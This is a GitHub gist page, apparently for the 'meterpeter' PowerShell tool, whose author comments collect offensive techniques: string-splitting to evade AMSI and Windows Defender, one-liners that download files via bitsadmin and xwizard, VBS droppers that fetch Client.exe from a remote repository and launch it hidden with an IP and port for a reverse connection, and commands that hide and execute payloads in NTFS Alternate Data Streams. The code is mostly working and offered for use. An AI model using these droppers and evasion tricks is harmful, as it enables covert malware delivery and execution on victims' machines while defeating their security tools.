r00t-3xp10it/meterpeter.ps1 Secret

Last active March 11, 2021 14:08

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/r00t-3xp10it/e55c196e7ac9e5fc1eb8ea6a2feb0d65.js"></script>
Save r00t-3xp10it/e55c196e7ac9e5fc1eb8ea6a2feb0d65 to your computer and use it in GitHub Desktop.

Download ZIP

meterpeter updates

Raw

meterpeter.ps1

meterpeter new updates

Author

r00t-3xp10it commented Sep 14, 2020 •

edited

Loading

For example, it will take a string like ... New-Object System.Net.Sockets.TCPClient ... and convert it to:

$a = "Syste"
$b = "m.Net.Soc"
$c = "kets.TCP"
$d = "Client"

... New-Object $a$b$c$d ...

Another example

$zvlOGdEJVsPNBDwfKFWpvFYvlgJXDvIUgTnQ = "b`y"
$kjEbjGhcfGYxfdIOzgvYTE.kjGTFhAfdUsjxIPbk = "pa`s`s"

amsi script.block signatures: https://github.com/PowerShell/PowerShell/blob/v6.0.0-alpha.18/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.cs#L1612-L1660

Author

r00t-3xp10it commented Sep 14, 2020 •

edited

Loading

not detected (windows defender)

server: https://raw.githubusercontent.com/federicochieregato/DarkFox/master/server.py
Client: https://github.com/federicochieregato/DarkFox/blob/master/client.py

darkarmor: https://blog.dylan.codes/bypassing-av-via/

use winHTTPRequest with this ? => https://github.com/r00t-3xp10it/venom/tree/master/templates/hta_attack

Author

r00t-3xp10it commented Sep 17, 2020 •

edited

Loading

onelinner download

bitsadmin /transfer hackingarticles http://192.168.1.13/ignite.png C:\Users\pedro\Desktop\ignite.png

start xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/2305mJkp && timeout 6 && taskkill /F /IM xwizard.exe >NUL

Download with VBS api

dropper.vbs (replace Objshell.Run API flagged by AV)

CreateObject("WS"+"cri"+"pt.Sh"+"ell").Exec "powershell -exec bypass -w 1 -C (NeW-Object Net.WebClient).DownloadFile('https://github.com/r00t-3xp10it/venom/blob/master/bin/Client.exe', '%tmp%\\Client.exe')" 
CreateObject("WS"+"cri"+"pt.Sh"+"ell").Exec "powershell Start-Process -windowstyle hidden -FilePath '%tmp%\\Client.exe' -ArgumentList 'ip=192.168.1.73','port=666'"

Author

r00t-3xp10it commented Sep 17, 2020 •

edited

Loading

Alternate data streams (ADS)

What are Alternate Data Streams?
Alternate Data Streams (ADS) have been around since the introduction of windows NTFS. They were designed to provide
compatibility with the old Hierarchical File System (HFS) from Mac which uses something called resource forks.

Basically, ADS can be used to hide the presence of a secret or malicious file inside the file record of an innocent file. That is,
when windows shows you a file, say "readme.txt", the metadata that tells your system where to get "readme.txt" may also
contain information for "EvilSpyware.exe". Thus, malicious files may be on your system and you cannot see them using normal means.

How to see Alternate Data Streams records in CLI?

dir /r

Proof-Of-Concept

Create one text file to be embebbed with one jpg image

echo test if it works > SSAredTeam.txt

Download kali-linux.jpg
Append the image file to the text file

type kali-linux.jpg > SSAredTeam.txt:kali-linux.jpg

Delete kali-linux.jpg image

del kali-linux.jpg

see ads

dir /r

Execute kali-linux.jpg image

mspaint.exe C:\Users\pedro\Desktop\SSAredTeam.txt:kali-linux.jpg

hidde mp3 in text file

Create one text file to be embebbed with one mp3 file

echo test if it works > SSAredTeam.txt

Append the mp3 file to the text file

type mysong.mp3 > SSAredTeam.txt:mysong.mp3

Delete mysong mp3

del mysong.mp3

see ads

dir /r

Execute mysong.mp3 (ads)

wmplayer.exe C:\Users\pedro\Desktop\SSAredTeam.txt:mysong.mp3

hidde exe in text file

Create one text file to be embebbed with one exe file

echo test if it works > SSAredTeam.txt

Append the exe file to the text file

type payload.exe > SSAredTeam.txt:payload.exe

Delete payload exe

del payload.exe

see ads

dir /r

Execute payload.exe (ads)

wmic.exe process call create "C:\Users\pedro\Desktop\SSAredTeam.txt:payload.exe"

Execute payload.bat stored in an Alternate Data Stream (ADS).

cmd.exe - < SSAredTeam.txt:payload.bat

Execute payload.ps1 stored in an Alternate Data Stream (ADS).

powershell .\SSAredTeam.txt:payload.ps1

Author

r00t-3xp10it commented Sep 17, 2020 •

edited

Loading

Download files using VBS

' Set your url settings and the saving options
strFileURL = "https://github.com/r00t-3xp10it/venom/blob/master/bin/Client.exe"
strHDLocation = "C:\Users\pedro\Desktop\Client.exe"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0    'Set the stream position to the start

Set objFSO = Createobject("Scripting.FileSystemObject")
if objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
x=MsgBox("File Successfully Downloaded" & vbCrLf & "Storage: C:\Users\pedro\Desktop\Client.exe",64,"VBS Downloader")
CreateObject("WScript.Shell").Exec "cmd /R start /min Client.exe ip=192.168.1.73 port=666"

Author

r00t-3xp10it commented Mar 11, 2021

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment